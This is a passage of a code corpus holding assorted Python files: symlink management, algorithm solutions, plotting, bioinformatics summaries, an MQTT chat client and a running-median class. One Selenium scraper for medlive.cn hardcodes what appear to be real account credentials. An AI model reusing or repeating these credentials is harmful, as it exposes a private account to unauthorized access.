on_disk_status(stem):\n srcpath = os.path.join(REPO, stem)\n dstpath = os.path.join(HOME, stem)\n if not os.path.exists(dstpath):\n return 'nonexistent'\n elif (stat.S_ISLNK(os.lstat(dstpath).st_mode)\n and os.readlink(dstpath) == srcpath):\n return 'linked'\n else:\n return 'conflict'\n\n\nif __name__ == '__main__':\n if len(sys.argv) == 1:\n action = 'status'\n elif len(sys.argv) == 2:\n action = sys.argv[1]\n else:\n raise ValueError(\"do `script [status]|link|unlink`\")\n\n if action == 'status':\n for stem in symlinks():\n print(\"{}: {}\".format(stem, on_disk_status(stem)))\n elif action == 'link':\n for stem in symlinks():\n s = on_disk_status(stem)\n if s == 'linked':\n pass\n elif s == 'nonexistent':\n print(\"Link\", stem)\n src = srcpath(stem)\n dst = dstpath(stem)\n os.makedirs(os.path.dirname(dst), exist_ok=True)\n os.symlink(src, dst)\n elif s == 'conflict':\n print(\"CONFLICT\", stem)\n else:\n raise ValueError(s, stem)\n elif action == 'unlink':\n for stem in symlinks():\n s = on_disk_status(stem)\n if s == 'linked':\n print(\"Unlink\", stem)\n os.unlink(dstpath(stem))\n elif s != 'nonexistent':\n print(stem, \"remains in state\", s)\n","sub_path":"scatter.py","file_name":"scatter.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"209923623","text":"# Solution with string slicing:\ndef strStr(self, haystack, needle):\n if needle == \"\":\n return 0\n if len(needle) > len(haystack):\n return -1\n for i in range(len(haystack)):\n if 
haystack[i: i+len(needle)] == needle:\n            return i \n    return -1\n\n# Solution with no string slicing:\ndef strStr(self, haystack, needle):\n    if needle == \"\":\n        return 0\n    if len(needle) > len(haystack):\n        return -1\n    for i in range(len(haystack)):\n        if haystack[i] == needle[0]:\n            j = i + 1\n            k = 1\n            while j < len(haystack) and k < len(needle):\n                if haystack[j] == needle[k] and k == len(needle) - 1: \n                    return (i)\n                if haystack[j] != needle[k]:\n                    break\n                else:\n                    j += 1\n                    k += 1 \n            if k == len(needle):\n                return i \n    return -1\n    \n    \n    ","sub_path":"leetcode/implement_strStr.py","file_name":"implement_strStr.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"314239719","text":"from collections import defaultdict\n\nT = int(input())\n\n\nfor test in range(1,T + 1): \n    \n    N, S = list(map(int, input().split()))\n\n    trinkets = list(map(int, input().split()))\n\n    # Sliding window over trinket values: grow r, shrink l while the window\n    # holds more than S distinct trinket types; track the best length seen.\n    l = 0\n\n    score = 0\n\n    trinkhash = defaultdict(int)\n\n    for r in range(N):\n        trinkhash[trinkets[r]] += 1\n        while len(trinkhash) > S:\n            trinkhash[trinkets[l]] -= 1\n            if trinkhash[trinkets[l]] == 0:\n                del trinkhash[trinkets[l]]\n            l += 1\n        score = max(score, r - l + 1)\n    \n    print(\"Case #{}: {}\".format(test,score))\n
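\n# Example (assuming the task asks for the longest window with at most S\n# distinct trinket types): trinkets = [1, 2, 1, 3] and S = 2 give the window\n# [1, 2, 1], so the printed score is 3.\n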
","sub_path":"Round B/DiverseDiffProb.py","file_name":"DiverseDiffProb.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"373194641","text":"#encoding='utf-8'\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom time import sleep\nimport http.client\n\n# HTTP request headers for the page\nheader = {\n'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'\n}\nhttp.client._MAXHEADERS = 20000\n# download path for the PDF files\ndownload_location = '/Users/mfhj-dz-001-068/pythonData/pdfData'\nprefs = {'download.default_directory': download_location}\noption = webdriver.ChromeOptions()\noption.add_experimental_option('prefs',prefs)\n# option.add_argument(\"--start-maximized\")\n# pass the configured options in when the browser object is instantiated\nbrowser = webdriver.Chrome(options=option)\n\ndef is_have_next_page(soup_url):\n    # log in to the account\n    browser.get(\n        'http://www.medlive.cn/auth/login?service=http%3A%2F%2Fguide.medlive.cn%2Fguideline%2Flist%3Ftype%3Dguide%26sort%3Dpublish%26year%3D0%26branch%3D0')\n    sleep(1)\n    browser.find_element_by_class_name('login-rightTab').click()\n    # enter the username and password\n    browser.find_element_by_id('username').send_keys(\"18610229039\")\n    sleep(1)\n    browser.find_element_by_id('password').send_keys(\"891655\")\n    sleep(1)\n    # click the login button\n    browser.find_element_by_id('loginsubmit').click()\n    sleep(1)\n    # jump to the department page and load the data\n    browser.get(soup_url)\n    sleep(1)\n    browser.execute_script(\"\"\"\n    (function () {\n        var y = 0;\n        var winHeight = window.innerHeight;\n        var step = 210;\n        window.scroll(0, 0);\n        function f() {\n            if (y <= document.body.scrollHeight) {\n                y += step;\n                window.scroll(0, y);\n                setTimeout(f, 100);\n            } else {\n                window.scroll(0, 0);\n                document.title += \"scroll-done\";\n            }\n        }\n        setTimeout(f, 1000);\n    })();\n    \"\"\")\n    print(\"Scrolling down...\")\n    while True:\n        if \"scroll-done\" in browser.title:\n            break\n        else:\n            print(\"Not at the bottom yet...\")\n\n    # # url link\n    # url = 'http://guide.medlive.cn/guideline/list?type=guide&year=0&sort=publish&branch=1'\n    # response = requests.get(url, headers=header)\n    #\n    # parse each detail listing with BeautifulSoup and print it\n    soup = BeautifulSoup(browser.page_source, 'html.parser')\n    result_input = soup.find_all('input', {'class': 'btn select'})\n    print(result_input[0].get('value'))\n    result_p = soup.find_all('p', {'class': 'guide_title'})\n    soup_p = BeautifulSoup(str(result_p), 'lxml')\n    result_a = soup_p.find_all('a')\n    print(len(result_a))\n    for i in result_a:\n        get_page_detail(i.get('href'))\n    browser.quit()\n\n# scrape the desired data from each page\ndef get_page_detail(url):\n    try:\n        browser.get(url)\n        browser.find_element_by_link_text('下载').click()\n    except:\n        print(url)\n\n\n\nif __name__ == '__main__':\n    is_have_next_page('http://guide.medlive.cn/guideline/list?type=guide&year=0&sort=publish&branch=1')\n\n\n\n\n","sub_path":"com/down_pdf/getDataPdfOneSubject.py","file_name":"getDataPdfOneSubject.py","file_ext":"py","file_size_in_byte":3067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"28956032","text":"from azure.storage.blob import BlobServiceClient\nfrom django.conf import settings\nimport os\n\n\nclass AzureBlob:\n    def __init__(self):\n        credential = os.environ[\"CREDENTIALS\"]\n        account_url = os.environ[\"ACCOUNT\"]\n        container = os.environ[\"CONTAINER\"]\n        blob = os.environ[\"BLOB\"]\n\n        service = BlobServiceClient(account_url=account_url, credential=credential)\n        self.blob = service.get_blob_client(container=container, blob=blob)\n\n    def download(self, write_to_file):\n        blob_data = self.blob.download_blob()\n        blob_data.readinto(write_to_file)\n\n    def upload(self, data):\n        self.blob.upload_blob(data, overwrite=True)\n
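        # Note: overwrite=True makes upload_blob replace any existing blob\n        # content instead of raising ResourceExistsError on a second upload.\n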
","sub_path":"business_app/services/cloud.py","file_name":"cloud.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"517315279","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndata = pd.read_csv('../lipids.csv', header=4)\n\ndiseased_data = data[data['diseased'] == 1]\n\nweights = (1 / len(diseased_data['chol'])) * np.ones_like(diseased_data['chol'])\n\nn, bin_cuts, patches = plt.hist(diseased_data['chol'], 25, weights=weights)\n\nplt.xlabel('concentration of plasma cholesterol (mg/dl)')\nplt.ylabel('frequency')\nplt.title('2D Histogram')\n\nplt.show()\n\nleft_cut = np.argmax(n)\n\nmidpoint = (bin_cuts[left_cut + 1] + bin_cuts[left_cut]) / 2\n\nprint(midpoint)\n\n#3D plot\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection ='3d')\nbin_num = 25\nhist, xedges, yedges = np.histogram2d(diseased_data['chol'], diseased_data['trig'], bins=bin_num)\nhist = hist / hist.sum()\nx_midp = xedges[:-1] + 0.5 * (xedges[1] - xedges[0])\ny_midp = yedges[:-1] + 0.5 * (yedges[1] - yedges[0])\nelements = (len(xedges) - 1) * (len(yedges) - 1)\nypos, xpos = np.meshgrid(y_midp, x_midp)\nxpos = xpos.flatten()\nypos = ypos.flatten()\nzpos = np.zeros(elements)\ndx = (xedges[1] - xedges[0]) * np.ones_like(bin_num)\ndy = (yedges[1] - yedges[0]) * np.ones_like(bin_num)\ndz = hist.flatten()\nax.bar3d(xpos, ypos, zpos, dx, dy, dz, color='b', zsort='average')\nax.set_xlabel('concentration of plasma cholesterol (mg/dl)')\nax.set_ylabel('concentration of plasma triglycerides (mg/dl)')\nax.set_zlabel('frequency')\nplt.title('3D Histogram')\n\nprint('While the individuals appear to have fairly normal cholesterol levels (~200 mg/dl), they tend to have fairly high triglyceride levels (>150 mg/dl).'\n\t'This could be the reason why they have some form of heart disease.'\n\t'I would say that groups with high triglyceride levels have the highest risk for heart disease.')\n\nplt.show()","sub_path":"Computation/Wk2_VisPandas/Wk2_Probs/3D_hist.py","file_name":"3D_hist.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"571063947","text":"from env import SELENIUM_GRID_HUB, platform, APPIUM_STANDALONE, APP_BASE_URL\n\nSELENIUM_HUB = SELENIUM_GRID_HUB if 'ios' not in platform else APPIUM_STANDALONE\n\nif 'ios' in platform:\n    CAPABILITIES = {\n        'platformName': 'iOS',\n        'platformVersion': '9.2',\n        'browserName': 'Safari',\n        'deviceName': 'iPad Air 2',\n        'safariIgnoreFraudWarning': True,\n        # 'nativeWebTap': True,\n        'nonSyntheticWebClick': False,\n    }\nelse:\n    CAPABILITIES = {\n        'platformName': 'MAC',\n        'browserName': 'firefox'\n    }","sub_path":"app/tests/functional/bootstrap/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"428301049","text":"import os, sys, glob\nimport utilities\n\ninFilePath = sys.argv[1]\nfindValue = sys.argv[2].decode('string-escape')\nreplaceValue = sys.argv[3].decode('string-escape')\noutFilePath = sys.argv[4]\n\ntext = utilities.readTextFromFile(inFilePath)\ntext = text.replace(findValue, replaceValue)\nutilities.writeScalarToFile(text, outFilePath)\n","sub_path":"code/ReplaceText.py","file_name":"ReplaceText.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"192127740","text":"#!/usr/bin/python3\n\nimport sys\nimport re\n\ndef revcomp(seq):\n    rev = seq[::-1]\n    return rev.translate(str.maketrans(\"ATGC\",\"TACG\"))\n\npattern = re.compile(\"([ATGC]+)\")\n\nfasta = open(sys.argv[1], \"r\")\nquery = dict()\nfor i in fasta:\n\tif i.startswith(\">\"):\n\t\tidx = i[1:].rstrip()\n\telse:\n\t\tquery[idx] = i.rstrip()\nfasta.close()\n\npatman = open(sys.argv[2], \"r\")\nfor i in patman:\n\tfields = i.split(\"\\t\")\n\tmatch = pattern.search(fields[1])\n\tif match:\n\t\tseq = match.group(1)\n\t\tif fields[4] == \"-\":\n\t\t\tseq = revcomp(seq)\n\t\tif seq == query[fields[0]]:\n\t\t\tprint(i,end=\"\")\n\telse:\n\t\tprint(\"ID not found\", file=sys.stderr)\npatman.close()\n","sub_path":"filter_by_query.py","file_name":"filter_by_query.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"194014488","text":"import random\n\n# A random draw decides the promotion, presumably between 0 and 100\n# If it is below 74, we apply a 15% discount\n# If it is 74 or above, we apply a 20% discount\n# We must print whenever a discount is applied\n# The exercise only asks for the amount of money discounted\n\nrifa = random.randint(0, 100)\nprecio = int(input('Enter your purchase total \\t'))\ndescuento = 0\n\n\nif rifa < 74:\n    descuento = precio * 0.15\n    print(f'The discount is {descuento}')\nelse:\n    descuento = precio * 0.20\n    print(f'The discount is {descuento}')\n\n","sub_path":"Estructuras Condicionales/Para que sigas practicando/13_descuento_azar.py","file_name":"13_descuento_azar.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"418470701","text":"try:\r\n    import argparse\r\nexcept ImportError:\r\n    print(\"Please check if module 'argparse' is installed\")\r\n    quit()\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('--csinensis', type=argparse.FileType('r'), required=True,\r\n                    
help=\"Table with results of C.sinensis phylostratigraphy analysis\")\r\nparser.add_argument('--psimillimum', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of P.simillimum phylostratigraphy analysis\")\r\nparser.add_argument('--fhepatica', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of F.hepatica phylostratigraphy analysis\")\r\nparser.add_argument('--fgigantica', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of F.gigantica phylostratigraphy analysis\")\r\nparser.add_argument('--ofelineus', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of O.felineus phylostratigraphy analysis\")\r\nparser.add_argument('--oviverrini', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of O.viverrini phylostratigraphy analysis\")\r\nparser.add_argument('--shaematobium', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of S.haematobium phylostratigraphy analysis\")\r\nparser.add_argument('--sjaponicum', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of S.japonicum phylostratigraphy analysis\")\r\nparser.add_argument('--smansoni', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of S.mansoni phylostratigraphy analysis\")\r\nparser.add_argument('--tregenti', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of T.regenti phylostratigraphy analysis\")\r\nparser.add_argument('--tszidati', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of T.szidati phylostratigraphy analysis\")\r\nparser.add_argument('--smediterranea', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of S.mediterranea phylostratigraphy analysis\")\r\nparser.add_argument('--mlignano', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of M.lignano phylostratigraphy analysis\")\r\nparser.add_argument('--pvittatus', type=argparse.FileType('r'), required=True,\r\n help=\"Table with results of P.vittatus phylostratigraphy analysis\")\r\nparser.add_argument('--levels', type=argparse.FileType('r'), required=True,\r\n help=\"Table with description of phylostratigraphic levels\")\r\nparser.add_argument('--output', type=str, required=True)\r\nargs = parser.parse_args()\r\n\r\n\r\ndef phylostratr_table_parsing(table, species_dict):\r\n header = table.readline()\r\n for line in table:\r\n description = line.strip().split(\"\\t\")\r\n protein_ID, mrca, ps, mrca_name = description[0][1:-1], description[1], description[2], description[3][1:-1]\r\n if mrca_name not in species_dict.keys():\r\n species_dict[mrca_name] = []\r\n species_dict[mrca_name].append(protein_ID)\r\n\r\n\r\ndef levels_parsing(levels, levels_dict):\r\n for line in levels:\r\n description = line.strip().split(\"\\t\")\r\n levels_dict[description[0][1:-1]] = description[1]\r\n\r\n\r\ndef merge_results(merged_dict, levels, ordered_levels, csinensis_dict, fgigantica_dict, fhepatica_dict,\r\n mlignano_dict, ofelineus_dict, oviverrini_dict, psimillimum_dict, pvittatus_dict,\r\n shaematobium_dict, sjaponicum_dict, smansoni_dict, smediterranea_dict,\r\n tregenti_dict, tszidati_dict):\r\n species_dicts = {\"Csinensis\": csinensis_dict, \"Fgigantica\": fgigantica_dict, \"Fhepatica\": fhepatica_dict,\r\n \"Mlignano\": mlignano_dict, \"Ofelineus\": ofelineus_dict, \"Oviverrini\": oviverrini_dict,\r\n \"Psimillimum\": psimillimum_dict, \"Pvittatus\": pvittatus_dict,\r\n \"Shaematobium\": 
shaematobium_dict, \"Sjaponicum\": sjaponicum_dict, \"Smansoni\": smansoni_dict,\r\n \"Smediterranea\": smediterranea_dict, \"Tregenti\": tregenti_dict, \"Tszidati\": tszidati_dict}\r\n\r\n for level in ordered_levels:\r\n merged_dict[level] = {\"Csinensis\": [], \"Fgigantica\": [], \"Fhepatica\": [], \"Mlignano\": [],\r\n \"Ofelineus\": [], \"Oviverrini\": [], \"Psimillimum\": [], \"Pvittatus\": [],\r\n \"Shaematobium\": [], \"Sjaponicum\": [], \"Smansoni\": [], \"Smediterranea\": [],\r\n \"Tregenti\": [], \"Tszidati\": []}\r\n\r\n for species, species_dict in species_dicts.items():\r\n protein_number = 0\r\n for mrca_name, proteins in species_dict.items():\r\n merged_dict[levels[mrca_name]][species].append(len(proteins))\r\n protein_number += len(proteins)\r\n # append per cents\r\n for level in merged_dict.keys():\r\n if len(merged_dict[level][species]) != 0:\r\n merged_dict[level][species].append((int(merged_dict[level][species][0])/protein_number)*100)\r\n else:\r\n merged_dict[level][species].extend([0, 0])\r\n\r\n\r\ndef write_output(output, ordered_levels, merged_dict):\r\n with open(\"{output}.phylostratr_summary.tsv\".format(output=output), 'a') as phylostratr_summary:\r\n phylostratr_summary.write(\"Levels\\tCsinensis\\tFgigantica\\tFhepatica\\tMlignano\\tOfelineus\\t\"\r\n \"Oviverrini\\tPsimillimum\\tPvittatus\\tShaematobium\\tSjaponicum\\tSmansoni\\t\"\r\n \"Smediterranea\\tTregenti\\tTszidati\\n\")\r\n for level in ordered_levels:\r\n values = [\"{num}({percent}%)\".format(num=merged_dict[level][species][0],\r\n percent=round(merged_dict[level][species][1], 2)) for species in\r\n [\"Csinensis\", \"Fgigantica\", \"Fhepatica\", \"Mlignano\", \"Ofelineus\", \"Oviverrini\", \"Psimillimum\",\r\n \"Pvittatus\", \"Shaematobium\", \"Sjaponicum\", \"Smansoni\", \"Smediterranea\", \"Tregenti\", \"Tszidati\"]]\r\n phylostratr_summary.write(\"{level}\\t{values}\\n\".format(level=level, values=\"\\t\".join(values)))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n ordered_levels = [\"Cellular_organisms\", \"Eukaryota\", \"Opisthokonta\", \"Metazoa\", \"Eumetazoa\", \"Bilateria\",\r\n \"Protostomia\", \"Spiralia\", \"Lophotrochozoa\", \"Platyhelminthes\", \"Class\",\r\n \"Order\", \"Family\", \"Genus\", \"Species\"]\r\n csinensis_dict, fgigantica_dict, fhepatica_dict, mlignano_dict, ofelineus_dict, oviverrini_dict, psimillimum_dict, \\\r\n pvittatus_dict, shaematobium_dict, sjaponicum_dict, smansoni_dict, smediterranea_dict, tregenti_dict, \\\r\n tszidati_dict = {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}\r\n levels_dict, merged_dict = {}, {}\r\n print(\"***** Input files parsing *****\")\r\n phylostratr_table_parsing(args.csinensis, csinensis_dict)\r\n phylostratr_table_parsing(args.fgigantica, fgigantica_dict)\r\n phylostratr_table_parsing(args.fhepatica, fhepatica_dict)\r\n phylostratr_table_parsing(args.mlignano, mlignano_dict)\r\n phylostratr_table_parsing(args.ofelineus, ofelineus_dict)\r\n phylostratr_table_parsing(args.oviverrini, oviverrini_dict)\r\n phylostratr_table_parsing(args.psimillimum, psimillimum_dict)\r\n phylostratr_table_parsing(args.pvittatus, pvittatus_dict)\r\n phylostratr_table_parsing(args.shaematobium, shaematobium_dict)\r\n phylostratr_table_parsing(args.sjaponicum, sjaponicum_dict)\r\n phylostratr_table_parsing(args.smansoni, smansoni_dict)\r\n phylostratr_table_parsing(args.smediterranea, smediterranea_dict)\r\n phylostratr_table_parsing(args.tregenti, tregenti_dict)\r\n phylostratr_table_parsing(args.tszidati, tszidati_dict)\r\n 
levels_parsing(args.levels, levels_dict)\r\n    print(\"***** Results merging *****\")\r\n    merge_results(merged_dict, levels_dict, ordered_levels, csinensis_dict, fgigantica_dict, fhepatica_dict,\r\n                  mlignano_dict, ofelineus_dict, oviverrini_dict, psimillimum_dict, pvittatus_dict,\r\n                  shaematobium_dict, sjaponicum_dict, smansoni_dict, smediterranea_dict, tregenti_dict, tszidati_dict)\r\n    print(\"***** Output creating *****\")\r\n    write_output(args.output, ordered_levels, merged_dict)\r\n","sub_path":"Flatworms_phylostratr_summary.py","file_name":"Flatworms_phylostratr_summary.py","file_ext":"py","file_size_in_byte":8398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"344757061","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport pylab as plt\nimport netCDF4\nimport datetime\n\n\"\"\"\nComparing forcing data from AROME MetCOOP model and the gridded observational data.\n\nAuthor: kmunve\n\n\"\"\"\n\narome_f = \"../Test/Data/FORCING_arome.nc\"\nobsgrid_f = \"../Test/Data/FORCING_obsgrid.nc\"\n\n\n#N = 35360\nN = 64197\n\narome_nc = netCDF4.Dataset(arome_f, 'r')\nobsgrid_nc = netCDF4.Dataset(obsgrid_f, 'r')\n\n\n###\n# AROME #\n###\n\na_lat_v = arome_nc.variables['LAT']\na_lon_v = arome_nc.variables['LON']\n\na_masl_v = arome_nc.variables['ZS']\n\na_ta_v = arome_nc.variables['Tair']\na_rr_v = arome_nc.variables['Rainf']\na_sf_v = arome_nc.variables['Snowf']\na_time_v = arome_nc.variables['time']\n\na_t = a_time_v[:]#netCDF4.num2date(a_time_v[:], a_time_v.units)\na_ta = a_ta_v[:, N]\na_rr = a_rr_v[:, N]\na_sf = a_sf_v[:, N]\n\n\n####\n# OBSGRID\n####\n\n\no_lat_v = obsgrid_nc.variables['LAT']\no_lon_v = obsgrid_nc.variables['LON']\n\no_masl_v = obsgrid_nc.variables['ZS']\n\no_ta_v = obsgrid_nc.variables['Tair']\no_rr_v = obsgrid_nc.variables['Rainf']\no_sf_v = obsgrid_nc.variables['Snowf']\no_time_v = obsgrid_nc.variables['time']\n\no_t = o_time_v[:]#netCDF4.num2date(o_time_v[:], o_time_v.units)\no_ta = o_ta_v[:, N]\no_rr = o_rr_v[:, N]\no_sf = o_sf_v[:, N]\n\n#t_width = datetime.timedelta(minutes=30)\nwidth = 0.25\n\nf, axarr = plt.subplots(3, sharex=True)\nplt.hold(True)\naxarr[0].axhline(273.65, color='k', linestyle=\"--\")\naxarr[0].plot(o_t, o_ta, color='r')\naxarr[0].plot(a_t, a_ta, color='b')\naxarr[0].set_title(\"OBSGRID coords: {0}, {1}\\nAROME coords: {2}, {3}\".format(o_lat_v[N], o_lon_v[N], a_lat_v[N], a_lon_v[N]))\naxarr[0].set_ylabel(\"Temperature\")\n\naxarr[1].bar(o_t+width, o_rr, width=width, color='r')\naxarr[1].bar(a_t, a_rr, width=width, color='b')\naxarr[1].set_ylabel(\"Rainfall rate\")\n\naxarr[2].bar(o_t+width, o_sf, width=width, color='r')\naxarr[2].bar(a_t, a_sf, width=width, color='b')\naxarr[2].set_ylabel(\"Snowfall rate\")\nplt.show()\n","sub_path":"Crocus/obsgrid_vs_arome_forc.py","file_name":"obsgrid_vs_arome_forc.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"49925694","text":"import paho.mqtt.client as paho\nimport logging\nfrom brokerData import * #MANU Connection information\nimport os \n#MANU Topic names \nUSUARIOS = 'usuarios'\nSALAS = 'salas'\nAUDIO = 'audio'\nGRUPO = '27'\n#MANU Handler invoked when the connection to the MQTT broker is established\ndef on_connect(client, userdata, flags, rc): \n    connectionText = \"CONNACK received from the broker with code: \" + str(rc)\n    logging.info(connectionText)\n\n#MANU Handler for a successful publish to the MQTT broker
\ndef on_publish(client, userdata, mid): \n    publishText = \"Publish successful\"\n    logging.debug(publishText)\n\n#MANU Callback executed whenever a message arrives on a subscribed topic\ndef on_message(client, userdata, msg):\n    from datetime import datetime\n    #MANU Show on screen the information that has arrived\n    logging.info(\"Source: \" + str(msg.topic))\n    firstopic = '{:.5}'.format(str(msg.topic))\n    if firstopic == 'audio':#AAMS Check whether the incoming message is Audio or Text\n        now = datetime.now()\n        name_ar = str(int(datetime.timestamp(now))) + '.wav' #AAMS Name of the audio file on the receiving side\n        archivo = open(name_ar,'wb') #AAMS Open the file for (over)writing\n        a = msg.payload\n        archivo.write(a) #AAMS Write the audio payload to the file\n        archivo.close() #AAMS Always close the file when writing is done\n        escuchar = 'aplay ' + name_ar\n        os.system(escuchar) #AAMS Play back the audio file\n        print(\"SEND TEXT = 1 \\nSEND AUDIO = 2 \\nSelection:\")\n    else:\n        logging.info(\"\\n1 Message received: \" + str(msg.payload))\n        print(\"SEND TEXT = 1 \\nSEND AUDIO = 2 \\nSelection:\")\n    \nclient = paho.Client(clean_session=True) #MANU New client instance\nclient.on_connect = on_connect #MANU Set the handler that runs when the connection happens\nclient.on_message = on_message #MANU Set the handler that fires when a message arrives on a subscribed topic\nclient.on_publish = on_publish #MANU Set the handler that fires after publishing something\nclient.username_pw_set(MQTT_USER, MQTT_PASS) #MANU Credentials required by the broker\nclient.connect(host=MQTT_HOST, port = MQTT_PORT) #MANU Connect to the remote server\n\ndef publishData(topicRoot, topicName, value, qos = 0, retain = False): #MANU Helper that builds a topic and publishes to it\n    topic = topicRoot + \"/\" + topicName\n    client.publish(topic, value, qos, retain)\n
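\n# Note: qos defaults to 0 (at-most-once delivery); pass qos=1 or qos=2 for\n# stronger delivery guarantees at the cost of extra broker handshakes.\n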
\\nENVIAR A SALA = 2 \\nSeleccion:\\n\")\n if MENU2 == '1': # AAMS el Usuario desea enviar texto a un usuario\n DESTINO = input(\"Destinatario/Usuario: \\n\")\n texto_enviar = input(\"Escribir mensaje: \\n\")\n publishData(USUARIOS, GRUPO + \"/\" + DESTINO , texto_enviar)\n logging.info(\"Mensaje enviado\\n\")\n if MENU2 == '2':# AAMS el usuario desea enviar texto a una sala\n DESTINO = input(\"Destinatario/#Sala: \\n\")\n texto_enviar = input(\"Escribir mensaje: \\n\")\n publishData(SALAS, GRUPO + \"/\" + DESTINO , texto_enviar)\n logging.info(\"Mensaje enviado\\n\")\n estado = 0 #AAMS El while principal seguira funcionando\n return estado\n if str(self.MENU1) == '2': # AAMS El usuario desea enviar un audio\n MENU2 = input(\"ENVIAR A USUARIO = 1 \\nENVIAR A SALA = 2 \\nSeleccion:\\n\")\n if MENU2 == '1':#AAMS El usuario desea enviar un audio a un usuario\n DESTINO = input(\"Destinatario/Usuario: \\n\")\n textob = fileReadAU()\n if textob != None:\n publishData(AUDIO, GRUPO + \"/\" + DESTINO , textob)\n logging.info(\"Mensaje enviado\\n\")\n if MENU2 == '2':#AAMS El usuario desea enviar un audio a una sala\n DESTINO = input(\"Destinatario/#Sala: \\n\")\n textob = fileReadAU()\n publishData(AUDIO, GRUPO + \"/\" + DESTINO , textob)\n logging.info(\"Mensaje enviado\\n\")\n estado = 0#AAMS El while principal seguira funcionando\n return estado\n if str(self.MENU1) == '3':#AAMS El usuario desea cerrar su sesion\n estado = 1#AAMS El while principal dejara de funcionar\n return estado\n \n \n\n ","sub_path":"cliente3/clienteclass.py","file_name":"clienteclass.py","file_ext":"py","file_size_in_byte":6071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"72667087","text":"import pickle\nimport jieba\nimport progressbar\nimport csv\n\n\ndef jieba_cut(boardname, filename):\n bar = progressbar.ProgressBar(max_value=progressbar.UnknownLength)\n ptt = pickle.load(open(\"/home/ptt/ptt_{}_{}.txt\".format(boardname, filename), \"rb\"))\n jieba.load_userdict(\"for_jieba_seasoning.txt\")\n\n\n total_page = len(ptt)\n start = 0\n end = 20000\n\n page_count = 0\n\n while True:\n for content in ptt[start:end]:\n seg_list = list(jieba.cut(content[-1], cut_all=False))\n content.append(seg_list)\n page_count += 1\n bar.update(page_count)\n\n pickle.dump(ptt, open(\"ptt_{}_text_jieba_pickle.txt\".format(boardname), \"wb\"))\n\n f = open('ptt_{}_text_jieba.csv'.format(boardname), 'w')\n w = csv.writer(f)\n w.writerows(ptt)\n f.close()\n\n if end == total_page:\n break\n\n start += 20000\n end += 20000\n if end > total_page:\n end = total_page\n\n ptt = pickle.load(open(\"ptt_{}_text_jieba_pickle.txt\".format(boardname), \"rb\"))\n","sub_path":"jieba_cut.py","file_name":"jieba_cut.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"428234335","text":"\"\"\"Output running medians for the number of words per line.\n\n\"\"\"\n__author__ = 'yun'\n\nimport optparse\nimport heapq\n\nimport util\n\n\nclass RunningMedian(object):\n \"\"\"A class to get the running median of a data stream.\n\n Takes O(u) as space complexity, where u is the number of UNIQUE elements\n in the data stream so far.\n\n Algorithmically, I use a max heap to store the elements NO greater than the\n median, and a min heap to store the elements greater than the median. 
In\n order to shrink the space, the elements in the heaps are stored as follows:\n\n (number, [occurrences]) e.g.\n (4, [27]) means the number 4 occurred 27 times in the data stream\n\n Additionally a hash table is used in order to look up an entry in constant\n time. Both the heaps and the hash table are of size u, where u is the\n number of UNIQUE elements in the data stream so far.\n\n In order to use python library heapq (which supports only min heap), I\n store negative numbers in the max heap, and positive numbers in the min\n heap.\n\n We keep balance between the size of max heap and min heap so that it takes\n O(1) to get the medians.\n\n \"\"\"\n def __init__(self):\n self.lookup_table = {}\n self.max_heap = []\n self.min_heap = []\n self.max_heap_size = 0\n self.min_heap_size = 0\n\n def get_median(self):\n \"\"\"Get the current median. If the number of elements in the data stream\n is even, get the average of the two medians.\n\n Takes O(1) as time complexity.\n\n Algorithmically, because the number of elements in the max heap 